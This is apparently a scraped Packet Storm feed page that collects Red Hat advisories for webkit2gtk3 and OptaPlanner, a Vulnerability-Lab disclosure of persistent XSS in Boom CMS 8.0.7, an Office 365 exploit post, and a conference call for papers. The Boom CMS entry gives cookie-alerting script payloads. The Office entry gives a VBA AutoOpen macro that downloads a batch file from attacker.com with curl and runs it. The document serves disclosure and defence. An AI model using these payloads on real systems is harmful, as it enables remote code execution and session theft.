Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Active Super Shop CMS 2.5 HTML Injection

Red Hat Security Advisory 2023-4202-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:4202-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4202  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-32435 CVE-2023-32439   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: memory corruption issue leading to arbitrary code execution  
(CVE-2023-32435)

* webkitgtk: type confusion issue leading to arbitrary code execution  
(CVE-2023-32439)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2218626 - CVE-2023-32435 webkitgtk: memory corruption issue leading to arbitrary code execution  
2218640 - CVE-2023-32439 webkitgtk: type confusion issue leading to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.38.5-1.el8_8.5.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.5.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.5.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32435  
https://access.redhat.com/security/cve/CVE-2023-32439  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBfAAoJENzjgjWX9erEVxoP/36PunYG/abTGPhTbzDfc4Gr  
TWe+1YZ0Bumn74sUuOk8Fk//CMm1W5NXMCZFK+grCQ5wNvJbQEpYQMU9Xz8kcpju  
Gv64wyRnXbYPCK2EgHKKHzMTNO0dK5rG1EQAQDZ/B+rdR9eX+7+oq+Mk4PsluHjc  
lmlixilcWV1j1GX3LqebpK3bT9kyGUdIzJ0M1r3Om9jPiyzbXQF508IPX/ZDJRzr  
AhMQ0dbMEgI7tLrXa+1il0VAlO47wpowlptaQafUXdZq1CqROOUaZDyTfP/8EoaJ  
Vmb6+FWx80cr+TNz644yAu4UpGnU4ajFWGrmQ7KCl9yTEVlEosGFtMpeeg0hCMvx  
VVki9nOPCtWsFKjuGmoLWVnUoeArkC4jkBw625Vp3JbgYhDyAtu2vnUig2gEXr5z  
pHgYxJz685dxo6y7Np+qxIozEuQxn1WlzBoUA+bha5GpgLuj8SHrMLsEqq3bnDbI  
5HMxutilgJIBHepvCUHsF6hn/MiSzhe0xKa7Vr6iJ58tBAW9thmKtLEV00rbXA+t  
5wMnEZkqEO/ACBuAgXiIllPgY58BXMnX7g4Ua9QwXLGVuRog3UrsBkuKUtAegUoS  
eTqth5pj2G+f1GeEAeUhN75o7xfdnCcyfdOXNWlnrJkMje7YWo3ApGBCQrRMHs28  
o5CVaCkiRISWgqNqTP2a  
=C5ZF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4202-01

Boom CMS version 8.0.7 suffers from a cross site scripting vulnerability.

    Document Title:===============Boom CMS v8.0.7 - Cross Site Scripting VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2274Release Date:=============2023-07-03Vulnerability Laboratory ID (VL-ID):====================================2274Common Vulnerability Scoring System:====================================5.3Vulnerability Class:====================Cross Site Scripting - PersistentCurrent Estimated Price:========================500€ - 1.000€Product & Service Introduction:===============================Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes lifeeasy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content.It gives editors control but doesn't require any technical knowledge.(Copy of the Homepage:https://www.boomcms.net/boom-boom  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Boom CMS v8.0.7 web-application.Affected Product(s):====================UXB LondonProduct: Boom v8.0.7 - Content Management System (Web-Application)Vulnerability Disclosure Timeline:==================================2022-07-24: Researcher Notification & Coordination (Security Researcher)2022-07-25: Vendor Notification (Security Department)2023-**-**: Vendor Response/Feedback (Security Department)2023-**-**: Vendor Fix/Patch (Service Developer Team)2023-**-**: Security Acknowledgements (Security Department)2023-07-03: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============MediumAuthentication Type:====================Restricted Authentication (User Privileges)User Interaction:=================Low User InteractionDisclosure Type:================Responsible DisclosureTechnical Details & Description:================================A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application.The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromisebrowser to web-application requests from the application-side.The vulnerability is located in the input fields of the album title and album description in the asset-manager module.Attackers with low privileges are able to add own malformed albums with malicious script code in the title and description.After the inject the albums are being displayed in the backend were the execute takes place on preview of the main assets.The attack vector of the vulnerability is persistent and the request method to inject is post. The validation tries to parsethe content by usage of a backslash. Thus does not have any impact to inject own maliciousjava-scripts because of its only performed for double- and single-quotes to prevent sql injections.Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistentexternal redirects to malicious source and persistent manipulation of affected application modules.Request Method(s):[+] POSTVulnerable Module(s):[+] assets-manager (album)Vulnerable Function(s):[+] addVulnerable Parameter(s):[+] title[+] descriptionAffected Module(s):[+] Frontend (Albums)[+] Backend (Albums Assets)Proof of Concept (PoC):=======================The persistent input validation web vulnerability can be exploited by remote attackers with low privileged user account and with low user interaction.For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.Manual steps to reproduce the vulnerability ...1. Login to the application as restricted user2. Create a new album3. Inject a test script code payload to title and description4. Save the request5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution6. Successful reproduce of the persistent cross site web vulnerability!Payload(s):><script>alert(document.cookie)</script><div style=1<a onmouseover=alert(document.cookie)>test</a>--- PoC Session Logs (Inject) ---https://localhost:8000/boomcms/album/35Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/jsonX-Requested-With: XMLHttpRequestContent-Length: 263Origin:https://localhost:8000Connection: keep-aliveReferer:https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Sec-Fetch-Site: same-origin{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYLOAD 2!]>","slug":"a","order":null,"site_id":1,"feature_image_id":401,"created_by":9,"deleted_by":null,"deleted_at":null,"created_at":"2021-xx-xx xx:x:x","updated_at":"2021-xx-xx xx:x:x"}-PUT: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie: Max-Age=7200; path=/Cookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;Max-Age=7200; path=/; httponlyContent-Length: 242Connection: Keep-AliveContent-Type: application/json-https://localhost:8000/boomcms/asset-manager/albums/[evil.source]Host: localhost:8000User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: laravel_session=eyJpdiI6ImVqSkTEJzQjlRPT0iLCJ2YWx1ZSI6IkxrdUZNWUFVV1endrZk1TWkxxdnErTUFDY2pBS0JSYTVFakppRnNub1kwSkF6amQTYiLCJtYyOTUyZTk3MjhlNzk1YWUzZWQ5NjNhNmRkZmNlMTk0NzQ5ZmQ2ZDAyZTED;-GET: HTTP/1.1 200 OKServer: ApacheCache-Control: no-cache, privateSet-Cookie:Vary: Accept-EncodingContent-Length: 7866Connection: Keep-AliveContent-Type: text/html; charset=UTF-8-Vulnerable Source: asset-manager/albums/[ID]<li data-album="36">         <a href="#albums/20">             <div>                 <h3>[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]</h3>                 <p class="description">"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>                 <p class='count'><span>0</span> assets</p>             </div>         </a>     </li></iframe></p></div></a></li></ul></div></div>         </div>         <div id="b-assets-view-asset-container"></div>         <div id="b-assets-view-selection-container"></div>         <div id="b-assets-view-album-container"><div><div id="b-assets-view-album">         <div class="heading">             <h1 class="bigger b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 1!]></h1>             <p class="description b-editable" contenteditable="true"><[MALICIOUS INJECTED SCRIPT CODE PAYLOAD 2!]></p>         </div>Solution - Fix & Patch:=======================The vulnerability can be patched by a secure parse and encode of the vulnerable title and description parameters.Restrict the input fields and disallow usage of special chars. Sanitize the output listing location to prevent further attacks.Security Risk:==============The security risk of the persistent input validation web vulnerability in the application is estimated as medium.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:www.vulnerability-lab.com    www.vuln-lab.com        www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2023 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Boom CMS 8.0.7 Cross Site Scripting

Microsoft Office 365 version 18.2305.1222.0 suffers from a remote code execution vulnerability when a malicious link is clicked on in a Word file.

    ## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation ofPrivilege Vulnerability + RCE.## Author: nu11secur1ty## Date: 07.18.2023## Vendor: https://www.microsoft.com/## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office## Reference: https://portswigger.net/web-security/access-control## CVE-2023-33148## Description:The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable toElevation of Privilege.The attacker can use this vulnerability to attach a very maliciousWORD file in the Outlook app which is a part of Microsoft Office 365and easily can trick the victim to click on it - opening it andexecuting a very dangerous shell command, in the background of thelocal PC. This execution is without downloading this malicious file,and this is a potential problem and a very dangerous case! This can bethe end of the victim's PC, it depends on the scenario.WARNING! Office 365 executes files directly from Outlook, without tempdownloading, security checking and etc.## Staus: HIGH Vulnerability[+]Exploit:- - - NOTE:This exploit is connected to the third-party server, and when thevictim clicks on it and opens it the content of the script which isinside will fetch on the machine locally and execute himself by usingMS Office 365 and Outlook app which is a part of the 365 API.```vbSub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -shttps://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat&& .\salaries.bat", vbNormalFocus)End Sub```## Reproduce:[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)## Proof and Exploit[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)## Time spend:00:35:00-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ andhttps://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and https://www.exploit-db.com/0day Exploit DataBase https://0day.today/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Microsoft Office 365 18.2305.1222.0 Remote Code Execution

Red Hat Security Advisory 2023-4200-01 - A new release for Red Hat Build of OptaPlanner 8.38.0 for Quarkus 2.13.8 including security updates is now available. The purpose of this text-only errata is to inform you about the security issues fixed. Red Hat Product Security has rated this update as having an impact of Important. A Common Vulnerability Scoring System base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link in the References section. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Build of OptaPlanner 8.38.0 for Quarkus 2.13.8 security update  
Advisory ID:       RHSA-2023:4200-01  
Product:           Red Hat build of OptaPlanner  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4200  
Issue date:        2023-07-18  
CVE Names:         CVE-2023-20883   
=====================================================================

1. Summary:

Red Hat Build of OptaPlanner 8.38.0 for Quarkus 2.13.8 release and security  
update is now available. The purpose of this text-only errata is to inform  
you about the security issues fixed.

Red Hat Product Security has rated this update as having an impact of  
Important.  
A Common Vulnerability Scoring System (CVSS) base score, which gives a  
detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

2. Description:

A new release for Red Hat Build of OptaPlanner 8.38.0 for Quarkus 2.13.8  
including security updates is now available. The purpose of this text-only  
errata is to inform you about the security issues fixed.  
Red Hat Product Security has rated this update as having an impact of  
Important.

A Common Vulnerability Scoring System (CVSS) base score, which gives a  
detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

 Security Fix(es):

  * CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability

5. JIRA issues fixed (https://issues.redhat.com/):

RHBOP-42 - Remove javadoc references on upstream BOM  
RHBOP-49 - Include sources  for antlr-runtime.jar to maven-repo.zip  
RHBOP-50 - Include sources  for jfreechart.jar to maven-repo.zip  
RHBOP-52 - [PLANNER-2899]Nearby selection for list variable

6. References:

https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/updates/classification/#important

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJktsBeAAoJENzjgjWX9erE/FIP/2sQQ2Cmytsm1Qa7oEfwoo/Y  
AuLAtfh5Lh4YswqxSm1G6yGSvMBvfiqXb1o/P8xQ/HXZ0I2AP+70aaxuINoztkdF  
m9mTYJ8+7jzqLAbIDm6yQ7GITGs/O5BNChwfP8pcT4cqWyAyACJcgtIu9Kkv0AZG  
QQSKDKrjyB7ItSj5tXZ7U7EARrVFKRpZcMVcRqJaz6wmy5HNIT/TAfHCmdAVeQfm  
KkhGKYxarS5ZFrJtTRoMZsUUA4vzW3AWLVwdKidwa0tUMxZ/9Q5cpmll9ZtwnzN1  
fV5DxX/wZbe3jwyLzTDJzyBHs2mAVvqqqjQfYO6O+3GfZyMIFK92Rh8MClIfbjll  
WE2km5Rx/75SyJ13rTG758Z6TzLWU3GGiNLGCtynyLLe865xbWg3kidX+2AuVvpC  
5CXj7HSmHSAV0IZhYI3LPEfEczRkGTiyK1Vvn7NM2G+ocQQUKmGWLEAorrW3Ys9J  
dU/SngE1IVjHYU0t22ev71jkosvjCMu9HGuHQzGOaRSoBimE22zNIj7cy/tRoCqY  
NU8rluDBITDrUiv7fwjt03x9P5rJNqenhevfC/7BFkZWXdoKIF7Yj1J2ubkkvGFw  
+UYPMmromb0H9A+elpelwa6aloqUXUHnIbAhgRrieo9+AkyzYVInGhBneD3dvW8i  
Z2MC8cRTV6nVoA5Ke0uA  
=zvQ0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4200-01

The call for papers for Hardwear.io 2023 in the Netherlands is now open. It will take place November 2nd through the 3rd, 2023 at the Marriott Hotel, The Hague, Netherlands.

    *Conference Name: *Hardwear.io Netherlands 2023*Important Dates:**CFP Deadline: *20th August 2023*Conference Dates: *2nd-3rd November 2023*Venue: *Marriott Hotel, The Hague, Netherlands*Website Link: *https://hardwear.io/netherlands-2023/Share your research findings with the Hardware community by becoming aspeaker!Welcome to the 09th Edition of Hardwear.io Netherlands, fasten yourseatbelts for intensive in-person trainings, top-notch hardware-securitytalks, professional networking, stimulating CTFs, and a challenging HardPwn.*Research Submission Categories:*1. *New Research: *A research topic that has not been presented/publishedor is not going to be presented/published before Hardwear.io Netherlands2023.2. *Current Research and Workshops: *Comprises known security issues, newresearch presented/published elsewhere, case studies, twist to existingresearch, vulnerability, exploit, or research-in-progress.3. *Tool Category: *Comprises open-source security tools, exploits,hardware, etc. This is an excellent opportunity for the original authors toshowcase their work to the world.*Speaker Benefits: *https://hardwear.io/netherlands-2023/cfp.phpWe are interested in new and cutting-edge security work that has previouslynot been published. Some security topics for your reference include (butare not limited to):Internet of Things / Smart Devices | Embedded Systems & Cryptography |Industrial Control Systems / SCADA | Satellite Systems | Hardware Firmware| Hardware PentestingReach out to cfp@hardwear.io for any further questions. Thank you!----------*Regards,**Sakshi Pitale**Community Outreach Officer **Nullcon Goa 2023 <https://nullcon.net/goa-2023> | CFP<https://nullcon.net/goa-2023/cfp/> | Registration<https://nullcon.net/goa-2023/Registration/>*

Source

Packet Storm